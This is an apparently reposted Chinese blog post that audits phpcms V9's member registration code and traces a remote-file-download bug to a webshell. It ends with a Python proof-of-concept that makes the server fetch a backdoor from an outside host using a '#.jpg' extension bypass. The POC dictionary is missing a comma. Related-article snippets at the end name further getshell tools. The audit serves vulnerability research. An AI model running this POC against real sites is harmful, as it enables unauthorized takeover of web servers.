phpcms V9 会员注册界面远程文件下载getshell漏洞源码审计

最新推荐文章于 2023-01-21 22:35:36 发布
最新推荐文章于 2023-01-21 22:35:36 发布
阅读量992 收藏
点赞数
分类专栏: 源码审计 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jietewang/article/details/118824437
版权

前几天客户网站被挂马了,于是对phpcms V9源码审计了一波。

该漏洞为远程文件下载,在会员注册界面存在参数可以执行远程下载命令,将后门文件下载到本地导致后门文件上传主机被控制,内容路径(/phpcms/modules/member/index.php),分析会员注册页面的register函数,结果如下图:

存在全局函数(new_html_special_chars),该函数处理处理字符编码问题,并将结果存储成数组

上图只是对字符做了转换,在以下的代码中,发现通过POST传递的info数组被传递给了get函数。

上图中在52行处,使用了$this->fields,关于它的定义在member_input类的构造函数里面,代码如下:

在上图第7行,可以看见是对拼接后的字符串传递进了getcache函数,跟进这个函数发现该函数判断了如果传递进来的变量值不在[a-zA-Z0-9_-]的范围中,返回false,函数结束,再去加载配置文件,这个函数用于读取缓存,传递进来的参数是'model_field_'.$modelid。

根据源码中符合上图的定义的文件有

在get函数中开到$info[$field] = $value,根据传递进来的值如果为1时,读取缓存文件(model_field_1.cache.php),关于formtype的配置为:

所以get函数的53行代码后段部分等同于$value = $this->editor($field, $value);也就是调用了editor函数,这里需要强调的是,触发漏洞需要调用editor函数,而我们读取缓存配置的文件有15个,然而其中符合'formtype' => 'editor',的文件只有9个,model_field_9.cache.php不在其中,所以我们传递进来的$modelid值就必须是1,2,3,10,11,12,13,14,15中的一个。然后我们现在继续跟进editor函数,代码如下:

其中$this->site_config的定义在content_input类的构造函数:

所以读取的缓存配置文件是phpcms/caches/caches_commons/caches_data/sitelist.cache.php,那么代码$this->site_config['setting']读取的setting的配置是:

在editor函数里调用了download函数,找到该函数,该函数在attachment类下

分析download函数,发现传递进去的第一个参数是规定为content,利用的时候提交info[content]=xxx,download函数分析如下:

在download函数的第153行代码,需要强调的是这里查了url后缀是否以gif|jpg|jpeg|bmp|png为后缀,不是就会直接结束。往下读代码,读到第73行代码,可以看见调用了fillurl函数,继续分析这个函数

代码的305行,最关键的一行代码$pos = strpos($surl,'#');这行代码将url里#前面的切割出来保存为url,而前面在download函数是查过后缀的,那么我们可以利用这一行代码达到绕过的目的,比如我们提交http://xxx/test.php#.jpg会通过对文件后缀的检查,然后经过切割,留下来的会是http://xxx/test.php成功绕过,然后fillurl函数剩下的代码就不是很重要了,主要做了先去掉url里的http://然后将在一起的多个单引号替换成了单个,最后返回的时候在加上http://。继续分析download函数没看完的代码,看到第166行代码,看到这里调用了fileext函数取文件扩展名,fileext函数代码如下:

分析代码后发现取得是最后一个点之后的内容当后缀名,这里需要强调是最后一个点,接着往下读,看第174行代码,其中$this->upload_func的定义在attachment类的构造函数,代码如下:

分析download函数,看第174行代码$upload_func($file, $newfile)就等同于copy($file, $newfile),将文件复制到了本地,那么利用刚才的‘最后一个点’,我们可以控制文件后缀名为php,到此漏洞触发的全过程已经展现,已经可以导致getshell。

构造POC利用代码

#!/usr/bin/python
#coding:utf-8

import requests
url_1 = 'http://127.0.0.1/phpcms/index.php?m=member&c=index&a=register&siteid=1' 

data_1 = {
	'siteid':'1',
	'modelid':'1',
	'username':'test',
	'password':'test',
	'email':'test@test.com',
	'info[content]':'href=http://xxx.xxx.xxx.xxx/test.txt?.php#.jpg', # 需要到此地址下载后门文件
	'dosubmit':'1'
	'protocol':'',
}
info = requests.post(url=url_1,data=data_1)
print(info.text)

本文来自知乎大佬【血魂】 

Jietewang
关注
专栏目录
PHPCMS v9本地文件包含漏洞Getshell
fansenliangren的博客
12-01 1511
文件包含是指程序代码在处理包含文件的时候没有严格控制。导致用户可以构造参数包含远程代码在服务器上执行,并得到网站配置或者敏感文件,进而获取到服务器权限,造成网站被恶意删除,用户和交易数据被篡改等一系列恶性后果......
phpcms v9本地验证getshell+代码验证
Amdy_amdy的博客
09-26 1589
phpcms v9本地验证getshell 本地验证成功: 如果通过phpcms查找不到具有这样的网站的话,还可以通过如下的特征字进行查找: list-2-4.html  扩展延伸成为:inurl:list-*-*.html 以下是通过本地搭建服务器进行测试: 通过注册界面:http://127.0.0.1/phpcmsv9.6.0/index.php ?m=member &c=...
PHP赋值函数的利用需求
weixin_33910460的博客
08-30 132
拿一段PHP代码来说 <?php class Site { /* 成员变量 */ var $url; var $title; /* 成员函数 */ function setUrl($par){ $this->url = $par; } function getUrl(){ echo $this-&...
PHPCMS v9 Getshell(Apache)
收集盒 Book box
03-05 1868
公开时间: 2013-03-04 简要描述: phpcms v9 getshell (apache) 详细说明: 漏洞文件:phpcms\modules\attachment\attachments.php  public function crop_upload() { if (isset($GLOBALS["HTTP_RAW_POST_DATA"])) {
phpcms v9 前台无限制GETSHELL
weixin_33842328的博客
04-03 1050
0x01:介绍PHPCMS V9(后面简称V9)采用PHP5+MYSQL做为技术基础进行开发。V9采用OOP(面向对象)方式进行基础运行框架搭建。模块化开发方式做为功能开发形式。框架易于功能扩展,代码维护,优秀的二次开发能力,可满足所有网站的应用需求。 5年开发经验的优秀团队,在掌握了丰富的WEB开发经验和CMS产品开发经验的同时,勇于创新追求完美的设计理念,为全球多达10万...
利用phpcms v9 0day拿shell+提权.wps
12-31
此Oday非同寻常,速度下载吧黑友们!一天几个站没问题!
Phpcms V9 管理后台登陆及会员注册登录模板的修改方法
09-29
本文将详细介绍如何修改Phpcms V9的后台登录界面样式以及会员注册登录模板。 首先,针对管理后台登录界面的修改,主要涉及到的是`login.tpl`模板文件。该文件位于`phpcms\modules\admin\templates\login.tpl`路径下...
PHPCMS V9专题模块注入漏洞的分析与修复方法
09-29
### PHPCMS V9专题模块注入漏洞的分析与修复方法 #### 一、漏洞背景介绍 PHPCMS V9是一款非常流行的开源内容管理系统(Content Management System, CMS),它提供了丰富的功能来帮助用户构建和管理网站。然而,即便...
PHPCMS资源网站源码软件源码下载站网站源码
09-26
在"PHPCMS资源网站源码软件源码下载站网站源码"中,我们可以理解为这是提供PHPCMS源码的下载平台,用于搭建一个专门发布和分享各种软件源码的下载站。这种网站通常会包含以下关键知识点: 1. **网站框架**:PHPCMS...
phpcms v9.任意文件上传漏洞复现
newlife1441的博客
08-15 4659
如果你也出现上面的情况请试试下面说的方法:这里有一个小坑注意,你在压缩前面的文件时要注意他们在压缩文件中的顺序,意思就是你创建的一个php文件在创建的txt文件的上面就可以成功,只有这样在解压失败后它还是能够保留并将php文件成功解压出来。时间竞争漏洞利用原理其实就是在解压文件后与删除限制的文件之间的时间空隙来利用提前在限制的文件中写好的利用代码在非解压目录下生成新的不会被删除的新文件(木马),通过这个木马来拿下网站。原理:这里我们通过利用解压文件在解压过程出错会导致后面的递归删除操作不会执行的特点。...
如何解决phpcms V9后台拿shell时出错问题
09-29
很多新手朋友都遇到过phpcms V9后台拿shell时出错,下面为大家介绍个不错的解决方法,希望对大家有所帮助
phpcms V9 getshell exp
收集盒 Book box
09-29 1981
#!usr/bin/php -w <?php error_reporting(E_ERROR); set_time_limit(0); $pass="xxx"; print_r(' +---------------------------------------------------------------------------+ PHPCms V9 GETSHELL 0DAY c0de by
phpCMS后台getshell
qq_45300786的博客
05-12 1528
这个phpCMS我们需要添加2个专题,才能getsheell 第一个专题 在“内容”模块的“专题”,添加新“专题”,新建一个专题,然后记住“专题名称”,在“专题导读写入webshell代码”(如下图) 第二个专题 在创建专题扩展哪里的模板index改成第一次专题../../../../html/special/moon/index提交自动在网站根目录下生成moon.php 查看文件生成成功 shell工具成功连接 ...
记一次phpcms9.6.3漏洞利用getshell到内网域控
plant1234的博客
06-25 2791
首现利用nmap扫描网段收集到主机ip地址: 扫描主机信息: 发现是win7的操作系统和开放80端口直接访问网站: 得到:扫描目录发现管理员登陆: 得到:弱口令:admin admin12345phpcms9.6.3后台getshell的洞网上有很多可以参考这篇博客: https://blog.csdn.net/weixin_42433470/article/details/112409431我这里利用的是:用户->管理员模块->添加会员模型得到shell:用蚁剑连接shell然后利用cs上线:利用的模块
PHPCMS v9.6.0后台getshell
BAM9090的博客
09-28 792
思路来自于http://www.cnbraid.com/2016/09/18/phpcms/ 这里自己复现了一下,自己写了一下 因为是后台的,还得登陆两次。。所以不好用,主要是学习学习 漏洞来自于ROOTDIR/phpsso_server/phpcms/modules/admin/system.php public function uc() { ...
phpcms v9前台getshell
weixin_34235457的博客
04-12 1324
PHPCMS是一款网站管理软件。该软件采用模块化开发,支持多种分类方式,使用它可方便实现个性化网站的设计、开发与维护。它支持众多的程序组合,可轻松实现网站平台迁移,并可广泛满足各种规模的网站需求,可靠性高,是一款具备文章、下载、图片、分类信息、影视、商城、采集、财务等众多功能的强大、易用、可扩展的优秀网站管理软件。看到到处都是这个漏洞的利用.加班完这个点看看触发点.主要的问题...
php %3cimg,phpcms v9 前台登记getshell 2017/04/09
weixin_33391446的博客
03-18 112
poc:siteid=1&modelid=11&username=123456&password=123456&email=123456@qq.com&info[content]=&dosubmit=1&protocol=这里的1.txt文件 就是放一句话的也可以在远程服务器 放一个文本文件效果图:python#coding:utf-8imp...
phpcms9-6-0 一键getshell工具
ai74583的博客
04-10 1048
介绍 一键化python 1.py http://xxx.com,如果是批量直接运行py文件即可 待办 [] 加入对有验证码phpcms网站的支持 [] 加入批量(已完成) 说明 依赖库的安装pip install requests 代码 # -*- coding:utf-8 -*- ''' ---------------------- Author : Akkuman Bl...
Phpcms V9.6.0任意文件写入getshell
最新发布
主题模板站的博客
01-21 667
PHPcms v9.6的任意文件上传的漏洞,已经潜伏半年多的一个漏洞。该漏洞可以在用户注册界面以未授权的情况下实现任意文件上传。phpcms v9.6正常部署phpcms v9.6就好。复现过程中,可以在用户注册页面通过POST提交:在src后面跟上自己shell的url。注意是要.txt格式写的shell。网上已经有逆向分析的过程,这次我来正向的分析一下这个洞。首先看到用户注册的模块,位于phpcms/modules/member/index.php的register方法中。代码很多,一点点往下看:完成了
Phpcms v9会员模型管理详解
"Phpcms v9管理会员模型的详细教程" Phpcms v9是一款功能强大的内容管理系统,其中的会员模型管理是其核心功能之一,允许管理员根据需求定义不同的会员类型,例如企业会员和高级会员,以实现更加精细化的用户管理。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值